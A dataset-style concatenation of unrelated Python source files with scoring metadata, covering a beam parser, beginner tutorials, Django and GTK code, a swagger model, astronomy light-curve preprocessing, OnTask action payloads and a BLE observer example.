heapq.heappush(beam,(prob1,ws1,cs1,p1))
print ('pushed',(prob1,ws1,cs1)) # for trace
print('|beam|=',len(beam)) # for trace
def parse(g,ws,k):
global n_steps
n_steps = 0
beam = [(-1.,ws,['S'],[])]
heapq.heapify(beam) # make list of derivations into a "min-heap"
while beam != []:
derive(g,beam,k)
if beam == []:
return False
else:
d=heapq.heappop(beam)
print('ll=', d[3])
print('Number of steps: ' + str(n_steps))
# ans = input('another? ')
# if len(ans)>0 and ans[0]=='n':
# return d[3]
# parse(g4, list('a'), 0.0001)
# parse(g4, list('aa'), 0.0001)
# parse(g4, list('aaa'), 0.0001)
# parse(g4, list('aaaa'), 0.0001)
# parse(g4, list('aaaaa'), 0.0001)
# parse(g4, list('aaaaaa'), 0.0001)
# parse(g4, list('aaaaaaa'), 0.0000001)
############################################################################################
# 3. Number of steps to parse 'a': 7
# Number of steps to parse 'aa': 19
# Number of steps to parse 'aaa': 52
# Number of steps to parse 'aaaa': 150
# Number of steps to parse 'aaaaa': 456
# Number of steps to parse 'aaaaaa': 1446
# Number of steps to parse 'aaaaaaa': 4735
#
# 4. For all values of 'n' greater than or equal to 1, the number of steps required
# to find all parses of the sentence exceeds 2^n.
#
#
| 2.8125
| 3
|
functions.py
|
justinhohner/python_basics
| 0
|
12784758
|
#!/usr/local/bin/python3
# https://www.tutorialsteacher.com/python/python-user-defined-function
"""
functions are an abstraction that makes code easier to read and follow,
breaking code up into discrete pieces of logic or functionality that are reusable
"""
"""
def function_name(parameters):
"function docstring"
statement1
statement2
...
...
return [expr]
"""
def f():
"First line is docstring. When called, a message will be displayed"
print ("Python functions are fun!")
return
"""
arguments
functions take arguments as inputs, perform some action on them,
and sometimes even return the results
arguments to a function are positional by default
"""
def f(x):
"f of x returns x^2"
return x**2
print(f(2))
"""
lambdas! anonymous functions
usually used one time, inline
"""
square = lambda x : x * x
print(square(5))
# more typical one time use from https://book.pythontips.com/en/latest/map_filter.html
number_list = range(-5, 5)
less_than_zero = list(filter(lambda x: x < 0, number_list))
print(less_than_zero)
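# map works the same way as filter (added example in the spirit of the linked tutorial):
# it applies the lambda to every element of the iterable
squared = list(map(lambda x: x * x, number_list))
print(squared)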
| 4.375
| 4
|
src/djangoreactredux/djrenv/lib/python3.5/site-packages/disposable_email_checker/fields.py
|
m2jobe/c_x
| 46
|
12784759
|
<reponame>m2jobe/c_x<gh_stars>10-100
# -*- coding: utf-8 -*-
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.core import validators
from .validators import validate_disposable_email
from .forms import DisposableEmailField as DisposableEmailFormField
class DisposableEmailField(models.EmailField):
default_validators = [validators.validate_email, validate_disposable_email]
description = _("Not a disposable email address")
def formfield(self, **kwargs):
# As with CharField, this will cause email validation to be performed
# twice.
defaults = {
'form_class': DisposableEmailFormField,
}
defaults.update(kwargs)
return super(DisposableEmailField, self).formfield(**defaults)
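# Added usage sketch (hypothetical model): the field drops in wherever models.EmailField would
# be used, additionally rejecting disposable-email domains via validate_disposable_email.
#
#   class Profile(models.Model):
#       email = DisposableEmailField(max_length=254)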
| 2.078125
| 2
|
test_tree_creator.py
|
mmokko/aoc2017
| 0
|
12784760
|
from unittest import TestCase
from day7 import TreeCreator
INPUT = '''pbga (66)
xhth (57)
ebii (61)
havc (66)
ktlj (57)
fwft (72) -> ktlj, cntj, xhth
qoyq (66)
padx (45) -> pbga, havc, qoyq
tknk (41) -> ugml, padx, fwft
jptl (61)
ugml (68) -> gyxo, ebii, jptl
gyxo (61)
cntj (57)'''
class TestTreeCreator(TestCase):
def test_create_tree(self):
sut = TreeCreator(INPUT)
sut.create()
self.assertEqual('tknk', sut.get_base_node().name)
def test_find_unbalanced_node(self):
sut = TreeCreator(INPUT)
sut.create()
self.assertEqual('ugml', sut.find_unbalanced_node().name)
self.assertEqual(60, sut.calculate_correct_weight_for_unbalanced_node(sut.find_unbalanced_node()))
| 3.34375
| 3
|
rainbow_walker.py
|
343max/led_lamp
| 0
|
12784761
|
<gh_stars>0
from process_pixel import process_pixel
from rpi_ws281x import Color
import asyncio
from helpers import hls_to_color
async def rainbow_walker(strip, wait_ms=10):
hue = 0
num_pixels = strip.numPixels()
badge_width = 60
while True:
for r in [
range(num_pixels - badge_width),
range(num_pixels - badge_width, 0, -1)
]:
for j in r:
for i in range(num_pixels):
strip.setPixelColor(i, process_pixel(0))
for k in range(j, j + badge_width):
strip.setPixelColor(k, process_pixel(hls_to_color(hue, 0.5, 1.0)))
strip.show()
hue += 0.001
if hue > 1:
hue = 0
await asyncio.sleep(wait_ms / 1000.0)
| 2.859375
| 3
|
witness/test_widgets2.py
|
robdelacruz/boneyard
| 0
|
12784762
|
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk, Pango, Gdk, GLib
import datetime
import ui
import conv
def icon_image(icon_name):
theme = Gtk.IconTheme.get_default()
icon = theme.load_icon(icon_name, -1, Gtk.IconLookupFlags.FORCE_SIZE)
img = Gtk.Image.new_from_pixbuf(icon)
return img
class MainWin(Gtk.Window):
width = 300
height = int(width * 3/2)
def __init__(self):
super().__init__(border_width=0, title="ui test")
self.set_size_request(MainWin.width, MainWin.height)
txt = """Longer note. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party."""
txt2 = """1. Longer note. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party.
2. Longer note. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party.
3. Longer note. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party."""
lbl = Gtk.Label()
lbl.set_hexpand(True)
lbl.set_xalign(0)
lbl.set_yalign(0)
lbl.set_line_wrap(True)
lbl.set_ellipsize(Pango.EllipsizeMode.END)
lbl.set_lines(2)
lbl.set_max_width_chars(5)
lbl.set_markup(txt2.strip().split("\n")[0])
self.add(ui.frame(lbl, "heading"))
self.connect("destroy", Gtk.main_quit)
self.show_all()
if __name__ == "__main__":
w = MainWin()
Gtk.main()
| 2.6875
| 3
|
modern_logic_client/models/customer.py
|
latourette359/modern_logic_client
| 0
|
12784763
|
# coding: utf-8
"""
Modern Logic Api
Manage and version your customer decision logic outside of your codebase # noqa: E501
OpenAPI spec version: 1.0.0
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class Customer(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'extra_properties': 'object',
'customer_id': 'str',
'first_name': 'str',
'last_name': 'str',
'email': 'str',
'phone': 'str',
'address_street': 'str',
'address_street2': 'str',
'address_city': 'str',
'address_state_code': 'str',
'address_zip': 'str',
'address_country_code': 'str',
'dob': 'date'
}
attribute_map = {
'extra_properties': 'extraProperties',
'customer_id': 'customerId',
'first_name': 'firstName',
'last_name': 'lastName',
'email': 'email',
'phone': 'phone',
'address_street': 'addressStreet',
'address_street2': 'addressStreet2',
'address_city': 'addressCity',
'address_state_code': 'addressStateCode',
'address_zip': 'addressZip',
'address_country_code': 'addressCountryCode',
'dob': 'dob'
}
def __init__(self, extra_properties=None, customer_id=None, first_name=None, last_name=None, email=None, phone=None, address_street=None, address_street2=None, address_city=None, address_state_code=None, address_zip=None, address_country_code=None, dob=None): # noqa: E501
"""Customer - a model defined in Swagger""" # noqa: E501
self._extra_properties = None
self._customer_id = None
self._first_name = None
self._last_name = None
self._email = None
self._phone = None
self._address_street = None
self._address_street2 = None
self._address_city = None
self._address_state_code = None
self._address_zip = None
self._address_country_code = None
self._dob = None
self.discriminator = None
if extra_properties is not None:
self.extra_properties = extra_properties
if customer_id is not None:
self.customer_id = customer_id
if first_name is not None:
self.first_name = first_name
if last_name is not None:
self.last_name = last_name
if email is not None:
self.email = email
if phone is not None:
self.phone = phone
if address_street is not None:
self.address_street = address_street
if address_street2 is not None:
self.address_street2 = address_street2
if address_city is not None:
self.address_city = address_city
if address_state_code is not None:
self.address_state_code = address_state_code
if address_zip is not None:
self.address_zip = address_zip
if address_country_code is not None:
self.address_country_code = address_country_code
if dob is not None:
self.dob = dob
@property
def extra_properties(self):
"""Gets the extra_properties of this Customer. # noqa: E501
:return: The extra_properties of this Customer. # noqa: E501
:rtype: object
"""
return self._extra_properties
@extra_properties.setter
def extra_properties(self, extra_properties):
"""Sets the extra_properties of this Customer.
:param extra_properties: The extra_properties of this Customer. # noqa: E501
:type: object
"""
self._extra_properties = extra_properties
@property
def customer_id(self):
"""Gets the customer_id of this Customer. # noqa: E501
Way that you uniquely identify customers # noqa: E501
:return: The customer_id of this Customer. # noqa: E501
:rtype: str
"""
return self._customer_id
@customer_id.setter
def customer_id(self, customer_id):
"""Sets the customer_id of this Customer.
Way that you uniquely identify customers # noqa: E501
:param customer_id: The customer_id of this Customer. # noqa: E501
:type: str
"""
self._customer_id = customer_id
@property
def first_name(self):
"""Gets the first_name of this Customer. # noqa: E501
Legal first name of the user being evaluated. # noqa: E501
:return: The first_name of this Customer. # noqa: E501
:rtype: str
"""
return self._first_name
@first_name.setter
def first_name(self, first_name):
"""Sets the first_name of this Customer.
Legal first name of the user being evaluated. # noqa: E501
:param first_name: The first_name of this Customer. # noqa: E501
:type: str
"""
self._first_name = first_name
@property
def last_name(self):
"""Gets the last_name of this Customer. # noqa: E501
Legal last name (surname) of the user being evaluated. # noqa: E501
:return: The last_name of this Customer. # noqa: E501
:rtype: str
"""
return self._last_name
@last_name.setter
def last_name(self, last_name):
"""Sets the last_name of this Customer.
Legal last name (surname) of the user being evaluated. # noqa: E501
:param last_name: The last_name of this Customer. # noqa: E501
:type: str
"""
self._last_name = last_name
@property
def email(self):
"""Gets the email of this Customer. # noqa: E501
Email address provided by user being evaluated. # noqa: E501
:return: The email of this Customer. # noqa: E501
:rtype: str
"""
return self._email
@email.setter
def email(self, email):
"""Sets the email of this Customer.
Email address provided by user being evaluated. # noqa: E501
:param email: The email of this Customer. # noqa: E501
:type: str
"""
self._email = email
@property
def phone(self):
"""Gets the phone of this Customer. # noqa: E501
Phone number of user being evaluated. # noqa: E501
:return: The phone of this Customer. # noqa: E501
:rtype: str
"""
return self._phone
@phone.setter
def phone(self, phone):
"""Sets the phone of this Customer.
Phone number of user being evaluated. # noqa: E501
:param phone: The phone of this Customer. # noqa: E501
:type: str
"""
self._phone = phone
@property
def address_street(self):
"""Gets the address_street of this Customer. # noqa: E501
Home address of user being evaluated # noqa: E501
:return: The address_street of this Customer. # noqa: E501
:rtype: str
"""
return self._address_street
@address_street.setter
def address_street(self, address_street):
"""Sets the address_street of this Customer.
Home address of user being evaluated # noqa: E501
:param address_street: The address_street of this Customer. # noqa: E501
:type: str
"""
self._address_street = address_street
@property
def address_street2(self):
"""Gets the address_street2 of this Customer. # noqa: E501
:return: The address_street2 of this Customer. # noqa: E501
:rtype: str
"""
return self._address_street2
@address_street2.setter
def address_street2(self, address_street2):
"""Sets the address_street2 of this Customer.
:param address_street2: The address_street2 of this Customer. # noqa: E501
:type: str
"""
self._address_street2 = address_street2
@property
def address_city(self):
"""Gets the address_city of this Customer. # noqa: E501
:return: The address_city of this Customer. # noqa: E501
:rtype: str
"""
return self._address_city
@address_city.setter
def address_city(self, address_city):
"""Sets the address_city of this Customer.
:param address_city: The address_city of this Customer. # noqa: E501
:type: str
"""
self._address_city = address_city
@property
def address_state_code(self):
"""Gets the address_state_code of this Customer. # noqa: E501
:return: The address_state_code of this Customer. # noqa: E501
:rtype: str
"""
return self._address_state_code
@address_state_code.setter
def address_state_code(self, address_state_code):
"""Sets the address_state_code of this Customer.
:param address_state_code: The address_state_code of this Customer. # noqa: E501
:type: str
"""
self._address_state_code = address_state_code
@property
def address_zip(self):
"""Gets the address_zip of this Customer. # noqa: E501
:return: The address_zip of this Customer. # noqa: E501
:rtype: str
"""
return self._address_zip
@address_zip.setter
def address_zip(self, address_zip):
"""Sets the address_zip of this Customer.
:param address_zip: The address_zip of this Customer. # noqa: E501
:type: str
"""
self._address_zip = address_zip
@property
def address_country_code(self):
"""Gets the address_country_code of this Customer. # noqa: E501
:return: The address_country_code of this Customer. # noqa: E501
:rtype: str
"""
return self._address_country_code
@address_country_code.setter
def address_country_code(self, address_country_code):
"""Sets the address_country_code of this Customer.
:param address_country_code: The address_country_code of this Customer. # noqa: E501
:type: str
"""
self._address_country_code = address_country_code
@property
def dob(self):
"""Gets the dob of this Customer. # noqa: E501
Date of birth for user being evaluated # noqa: E501
:return: The dob of this Customer. # noqa: E501
:rtype: date
"""
return self._dob
@dob.setter
def dob(self, dob):
"""Sets the dob of this Customer.
Date of birth for user being evaluated # noqa: E501
:param dob: The dob of this Customer. # noqa: E501
:type: date
"""
self._dob = dob
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Customer, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Customer):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 1.476563
| 1
|
scripts/preprocess.py
|
uiucsn/phast
| 0
|
12784764
|
<reponame>uiucsn/phast<filename>scripts/preprocess.py
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import glob
import extinction
from astropy.cosmology import Planck13 as cosmo
#The limiting magnitude of your survey
MAG_LIM = 33.0
ZPT = 30.0
wvs = np.asarray([3600, 4760, 6215, 7545, 8700, 10150])
bands = 'ugrizY'
def shift_lc(df):
"""A code to compute the phase of transient data relative to
the time of trigger.
Parameters
----------
df : Pandas DataFrame
The full dataframe for each event, containing the columns
'MJD' and 'MJD_TRIGGER'.
Returns
-------
Pandas DataFrame
The same dataframe, but with the phase column 'T'.
"""
df['T'] = df['MJD'] - df['MJD_TRIGGER']
return df
def cut_lc(df, min=-30, max=150):
"""Short summary.
Parameters
----------
df : Pandas DataFrame
The dataframe containing the photometry of all events.
min : float
The minimum phase (relative to trigger) at which to truncate photometry.
max : float
The maximum phase (relative to trigger) at which to truncate photometry.
Returns
-------
Pandas DataFrame
The same dataframe with truncated data.
"""
for idx, row in df.iterrows():
Times = row['T']
Flux = row['Flux']
Flux_Err = row['Flux_Err']
Filter = row['Filter']
MJD = row['MJD']
#truncate
ii = (Times > min) & (Times < max)
Flux = Flux[ii]
Flux_Err = Flux_Err[ii]
Times = Times[ii]
Filter = Filter[ii]
MJD = MJD[ii]
df.at[idx, 'T'] = Times
df.at[idx, 'Filter'] = Filter
df.at[idx, 'MJD'] = MJD
df.at[idx, 'Flux'] = Flux
df.at[idx, 'Flux_Err'] = Flux_Err
return df
def correct_time_dilation(df):
"""Short summary.
Parameters
----------
df : Pandas DataFrame
The dataframe containing the photometry of all events.
Returns
-------
Pandas DataFrame
The same dataframe with undilated times.
"""
for idx, row in df.iterrows():
row['T'] = row['T'] / (1.+row.ZCMB)
return df
def correct_extinction(df, wvs):
"""Corrects photometry for milky way extinction (requires MWEBV in the pandas dataframe!).
Parameters
----------
df : Pandas DataFrame
The dataframe containing the photometry of all events.
wvs : array-like
Central wavelengths (in Angstroms) of the survey filters.
Returns
-------
Pandas DataFrame
The same dataframe with extinction-corrected magnitudes.
"""
for idx, row in df.iterrows():
alams = extinction.fm07(wvs, row.MWEBV)
tempMag = np.array(row.Mag)
for i, alam in enumerate(alams):
if bands[i] in row.Filter:
ii = np.array(row.Filter)[0] == bands[i]
tempMag[ii] -= alam
df.at[idx, 'Mag'] = tempMag
return df
def calc_abs_mags(df, err_fill=1.0):
"""Converts apparent to absolute magnitudes and
fill in missing photometry.
Parameters
----------
df : Pandas DataFrame
The dataframe containing the photometry of all events.
err_fill : float
The dummy uncertainty to report for filled-in values.
Returns
-------
Pandas DataFrame
The same dataframe with absolute magnitudes.
"""
df['Mag'] = [[np.nan]]*len(df)
df['Mag_Err'] = [[np.nan]]*len(df)
df['Abs_Lim_Mag'] = np.nan
for idx, row in df.iterrows():
k_correction = 2.5 * np.log10(1.+row.ZCMB)
dist = cosmo.luminosity_distance([row.ZCMB]).value[0] # returns dist in Mpc
abs_mags = -2.5 * np.log10(row.Flux) + ZPT - 5. * \
np.log10(dist*1e6/10.0) + k_correction
# Sketchy way to calculate error - update later
abs_mags_plus_err = -2.5 * np.log10(row.Flux + row.Flux_Err) + ZPT - 5. * \
np.log10(dist*1e6/10.0) + k_correction
abs_mags_err = np.abs(abs_mags_plus_err - abs_mags)
abs_lim_mag = MAG_LIM - 5.0 * np.log10(dist * 1e6 / 10.0) + \
k_correction
abs_mags_err[abs_mags != abs_mags] = err_fill
abs_mags[abs_mags != abs_mags] = abs_lim_mag
df.at[idx, 'Mag'] = abs_mags
df.at[idx, 'Mag_Err'] = abs_mags_err
df.at[idx, 'Abs_Lim_Mag'] = abs_lim_mag
return df
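# Added reference comment: the conversion above is the usual distance-modulus form
#   M = -2.5*log10(flux) + ZPT - 5*log10(d_L / 10 pc) + K,  with K = 2.5*log10(1 + z),
# and epochs with missing flux are filled with the survey limiting magnitude (abs_lim_mag)
# and a dummy uncertainty of err_fill.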
#def getGPLCs(df):
def stackInputs(df, params):
"""Some basic description
Parameters
----------
df : Pandas DataFrame
The dataframe containing the photometry of all events.
params : dict
Dictionary of all run params
Returns
-------
dict
Dictionary mapping each event CID to its stacked light-curve matrix.
"""
LCs = {}
if params['GP']:
bands = params['bands'] #use all bands if we have gp-interpolation for them!
for idx, row in df.iterrows():
SN = row.CID
Time = row['T']
Mag = row.Mag
Mag_Err = row.Mag_Err
Filt = row.Filter
for i in np.arange(len(bands)):
band = bands[i]
bandTimes = Time[Filt==band]
bandMags = Mag[Filt==band]
bandErrs = Mag_Err[Filt==band]
if i==0:
matrix = [bandTimes]
else:
matrix.append([bandMags, bandErrs])
matrix = np.vstack(matrix)
LCs[row.CID] = matrix
else:
bands = params['band_stack']
#get max length of a matrix
maxLen = np.nanmax([len(x) for x in df['MJD'].values])
for idx, row in df.iterrows():
SN = row.CID
Time = row['T']
Mag = row.Mag
Mag_Err = row.Mag_Err
Filt = row.Filter
for band in bands:
matrix = np.zeros((maxLen, 3))
if np.nansum(Filt==band) == 0:
continue
bandTimes = Time[Filt==band]
bandMags = Mag[Filt==band]
bandErrs = Mag_Err[Filt==band]
padLen = maxLen - len(bandMags)
abs_mag_lim = df.at[idx, 'Abs_Lim_Mag'].astype(np.float64)
padR = int(padLen/2)
padF = padR
if padLen%2 == 1:
#pad more on the forward end than the back end
padF += 1
padArr_R = [abs_mag_lim]*padR
padErr_R = [1.0]*padR
padArr_F = [abs_mag_lim]*padF
padErr_F = [1.0]*padF
timePad_R = -np.arange(0,padR)*pad_cadence-pad_cadence + np.nanmin(bandTimes)
np.flip(timePad_R)
timePad_F = np.arange(0,padF)*pad_cadence + pad_cadence + np.nanmax(bandTimes)
#combine
stackTimes = np.concatenate([timePad_R, bandTimes, timePad_F])
stackMags = np.concatenate([padArr_R, bandMags, padArr_F])
stackErrs = np.concatenate([padErr_R, bandErrs, padErr_F])
matrix = np.vstack([stackTimes, stackMags, stackErrs])
LCs[row.CID] = matrix
return LCs
#def getGPLCs(df):
def stackGPInputs(df, bands='ugrizY'):
"""Some basic description
Parameters
----------
df : Pandas DataFrame
The dataframe containing the photometry of all events.
bands : str
Band labels to stack (defaults to 'ugrizY').
Returns
-------
dict
Dictionary mapping each event CID to its stacked GP light-curve matrix.
"""
LCs = {}
#get max length of a matrix
for idx, row in df.iterrows():
SN = row.CID
Time = row['GP_T']
Flux = row['GP_Flux']
Flux_Err = row['GP_Flux_Err']
Filt = row['GP_Filter']
#in the GP model, we're at the same time for everything
Time = Time[Filt == 'u'] #pick any band, doesn't matter
maxLen = len(Time)
for band in bands:
matrix = np.zeros((maxLen, len(bands)*2+1)) #ugrizY Flux, ugrizY err, time
bandFlux = Flux[Filt==band]
bandErrs = Flux_Err[Filt==band]
#get GP LCs
if bands == 'u':
matrix = np.vstack([stackTimes, bandFlux, bandErrs])
else:
matrix = np.vstack([matrix, bandFlux, bandErrs])
LCs[row.CID] = matrix
return LCs
def encode_classes(df):
"""Encodes the output classes as integers and returns a
dictionary of the encodings.
Parameters
----------
df : Pandas DataFrame
The dataframe containing the photometry of all events.
Returns
-------
Pandas DataFrame
The same dataframe with encoded column Type_ID.
Pandas dict
Dictionary of encoded classes.
"""
df['Type_ID'] = df['Type'].astype('category').cat.codes
#some clunky trickery to get the mapping from classes to values
encoding_dict = df[['Type', 'Type_ID']].drop_duplicates(subset=['Type', 'Type_ID']).sort_values(by='Type_ID').reset_index(drop=True)['Type'].to_dict()
return df, encoding_dict
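# Added illustrative example: for Type values ['SNIa', 'SNII', 'SNIa'], pandas assigns category
# codes alphabetically, so Type_ID becomes [1, 0, 1] and the returned encoding_dict is
# {0: 'SNII', 1: 'SNIa'}.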
| 2.40625
| 2
|
connect/cli/plugins/project/validators.py
|
cloudblue/product-sync
| 12
|
12784765
|
from interrogatio.core.exceptions import ValidationError
from interrogatio.validators import Validator
class PythonIdentifierValidator(Validator):
def validate(self, value, context=None):
if not value:
return
if not value.isidentifier():
raise ValidationError('Introduced data is not a valid Python identifier')
| 2.765625
| 3
|
ontask/action/payloads.py
|
LucasFranciscoCorreia/ontask_b
| 0
|
12784766
|
# -*- coding: utf-8 -*-
"""Classes capturing the payloads used when running actions."""
import collections
from typing import Dict, Mapping, Optional
from django.conf import settings
from django.contrib.sessions.backends.base import SessionBase
from django.contrib.sessions.models import Session
action_session_dictionary = 'action_run_payload'
class ActionPayload(collections.MutableMapping):
"""Objects to store the information required for action execution.
Look at the subclasses in this file for the different varieties
"""
fields = []
def __init__(self, initial_values=None):
"""Initialize the store and store given arguments."""
super().__init__()
self.store = {
'exclude_values': [],
'prev_url': '',
'post_url': '',
'button_label': '',
'valuerange': 0,
'step': 0,
}
if initial_values:
self.update(initial_values)
def __getitem__(self, key):
"""Verify that the key is in the allowed fields.
:param key: For lookup
:return: Value
"""
if settings.DEBUG:
if key not in self.fields:
raise Exception('Incorrect key: ' + key)
return self.store[self.__keytransform__(key)]
def __setitem__(self, key, item_value):
"""Verify that the key is in the allowed fields.
:param key: lookup
:param item_value: to be set
:return: Nothing
"""
if settings.DEBUG:
if key not in self.fields:
raise Exception('Incorrect key lookup.')
self.store[self.__keytransform__(key)] = item_value
def __delitem__(self, key): # noqa: Z434
"""Delete an item."""
del self.store[self.__keytransform__(key)] # noqa: Z420
def __iter__(self):
"""Return iterator."""
return iter(self.store)
def __len__(self):
"""Return length."""
return len(self.store)
def __keytransform__(self, key):
"""Transform the key."""
return key
def get_store(self):
"""Return the store."""
return self.store
class EmailPayload(ActionPayload):
"""Objects to store the information required for email execution.
Object to package the items required to carry out the email execution of an
action. The object has the following fields:
- action id: PK for the action being executed
- subject: email subject
- item_column: Name of the column that contains the target email addresses
- cc_email: List of emails to include in the cc
- bcc_email: List of emails to include in the bcc
- confirm_items: Boolean encoding if a final item confirmation is needed
- send_confirmation: Boolean encoding if a confirmation email is required
- track_read: Boolean encoding if the email read is going to be tracked
- export_wf: Boolean encoding if the workflow needs to be exported
- exclude_values: Values in item_column that must be excluded
- prev_url: URL to go back to the previous step in the process
- post_url: URL to go next in the process
- button_label: To use the right button label in the web page
- valuerange: Range of steps considered
- step: current step on that range
"""
fields = [
'action_id',
'subject',
'item_column',
'cc_email',
'bcc_email',
'confirm_items',
'send_confirmation',
'track_read',
'export_wf',
'exclude_values',
'prev_url',
'post_url',
'button_label',
'valuerange',
'step',
]
class SendListPayload(ActionPayload):
"""Objects to store the information required for send list execution.
Object to package the items required to carry out the execution of an
action of type send list. The object has the following fields:
- action id: PK for the action being executed
- subject: email subject
- email_to: Destination email
- cc_email: List of emails to include in the cc
- bcc_email: List of emails to include in the bcc
- export_wf: Boolean encoding if the workflow needs to be exported
"""
fields = [
'action_id',
'subject',
'email_to',
'cc_email',
'bcc_email',
'export_wf',
]
class CanvasEmailPayload(ActionPayload):
"""Objects to store the information required for Canvas Email execution.
Object to package the items required to carry out the JSON execution of an
action. The object has the following fields:
- action id: PK for the action being executed
- prev_url: URL to go back to the previous step in the process
- post_url: URL to go next in the process
- button_label: To use the right button label in the web page
- valuerange: Range of steps considered
- step: current step on that range
"""
fields = [
'action_id',
'subject',
'item_column',
'export_wf',
'target_url',
'confirm_items',
'exclude_values',
'prev_url',
'post_url',
'button_label',
'valuerange',
'step',
]
class JSONPayload(ActionPayload):
"""Objects to store the information required for JSON execution.
Object to package the items required to carry out the JSON execution of an
action. The object has the following fields:
- action id: PK for the action being executed
- token: for identification when making the request
- item_column: Column that contains the value to personalize
- exclude_values: Values in item_column that must be excluded
- prev_url: URL to go back to the previous step in the process
- post_url: URL to go next in the process
- button_label: To use the right button label in the web page
- valuerange: Range of steps considered
- step: current step on that range
"""
fields = [
'action_id',
'token',
'item_column',
'export_wf',
'confirm_items',
'exclude_values',
'prev_url',
'post_url',
'button_label',
'valuerange',
'step',
]
class JSONListPayload(ActionPayload):
"""Object to store the information required for JSON List execution.
Object to package the items required to carry out the execution of a JSON
list action. The object has the following fields:
    - action id: PK for the action being executed
    - token: for identification when making the request
    - item_column: Column that contains the value to personalize
    - export_wf: Boolean encoding if the workflow needs to be exported
"""
fields = [
'action_id',
'token',
'item_column',
'export_wf',
]
class ZipPayload(ActionPayload):
"""Objects to store the information required for JSON execution.
Object to package the items required to carry out the ZIP execution of an
action. The object has the following fields:
- action id: PK for the action being executed
- item_column: Column that contains the value to personalize
- exclude_values: Values in item_column that must be excluded
- prev_url: URL to go back to the previous step in the process
- post_url: URL to go next in the process
- button_label: To use the right button label in the web page
- valuerange: Range of steps considered
- step: current step on that range
"""
fields = [
'action_id',
'item_column',
'confirm_items',
'exclude_values',
'user_fname_column',
'file_suffix',
'zip_for_moodle',
'prev_url',
'post_url',
'button_label',
'valuerange',
'step',
]
def get_action_payload(session: SessionBase) -> Dict:
"""Get the payload from the current session.
:param session: Session object
:return: request.session[session_dictionary_name] or None
"""
return session.get(action_session_dictionary)
def set_action_payload(
session: SessionBase,
payload: Optional[Mapping] = None,
):
"""Set the payload in the current session.
:param session: Session object
:param payload: Dictionary to store
"""
session[action_session_dictionary] = payload
def get_or_set_action_info(
session: Session,
payloadclass,
action_info: Optional[ActionPayload] = None,
initial_values: Optional[Dict] = None,
) -> Optional[ActionPayload]:
"""Get (from the session object) or create an ActionPayload object.
First check if one is given. If not, check in the session. If there is no
object in the session, create a new one with the initial values.
:param session: HTTP session object
:param payloadclass: class to use to create a action_info object.
:param action_info: ActionInfo object just in case it is present.
:param initial_values: A dictionary to initialize the class if required
:return: Existing,newly created ActionInfo object, or None
"""
if action_info:
# Already exists, no need to create a new one
return action_info
action_info = session.get(action_session_dictionary)
if action_info:
return payloadclass(action_info)
if not initial_values:
# Nothing found in the session and no initial values given.
return None
# Create the object with the given class
action_info = payloadclass(initial_values)
session[action_session_dictionary] = action_info.get_store()
session.save()
return payloadclass(initial_values)
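# A minimal usage sketch (the field values and the `request` object below are illustrative only):
#   payload = EmailPayload({'action_id': 1, 'subject': 'Week 3 feedback'})
#   payload['item_column'] = 'email'
#   set_action_payload(request.session, payload.get_store())
#   stored = get_or_set_action_info(request.session, EmailPayload)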
| 2.25
| 2
|
examples/basic_observer.py
|
ddunmire/python-bleson
| 103
|
12784767
|
<reponame>ddunmire/python-bleson
#!/usr/bin/env python3
import sys
from time import sleep
from bleson import get_provider, Observer
# Get the wait time from the first script argument or default it to 10 seconds
WAIT_TIME = int(sys.argv[1]) if len(sys.argv)>1 else 10
def on_advertisement(advertisement):
print(advertisement)
adapter = get_provider().get_adapter()
observer = Observer(adapter)
observer.on_advertising_data = on_advertisement
observer.start()
sleep(WAIT_TIME)
observer.stop()
| 2.671875
| 3
|
_python/python_stack/_python/assignments/forloop_basic_1.py
|
fatimaalheeh/python_stack
| 0
|
12784768
|
<filename>_python/python_stack/_python/assignments/forloop_basic_1.py
#1.
for onehundredfifty in range(151):
print(onehundredfifty)
#2.
for thousandFives in range(5,1001,5):
print(thousandFives)
#3.
for hundred in range(1,101):
    if hundred % 10 == 0:
        print("CodingDojo!")
    elif hundred % 5 == 0:
        print("Coding")
    else:
        print(hundred)
#4.
sum =0
for halfmillion in range(500001):
if halfmillion%2!=0:
sum+=halfmillion
print(sum)
#5.
count = 2018
while count > 0:
print( count)
count -= 4
#6.
lowNum=2
highNum=9
mult=3
res=0
for i in range(lowNum,highNum):
if res < highNum:
res+=mult
print(res)
else:
break
| 3.96875
| 4
|
dogen/plugins/dist_git.py
|
jboss-dockerfiles/dogen
| 14
|
12784769
|
import os
import re
import subprocess
from dogen.tools import Tools, Chdir
from dogen.plugin import Plugin
class DistGitPlugin(Plugin):
@staticmethod
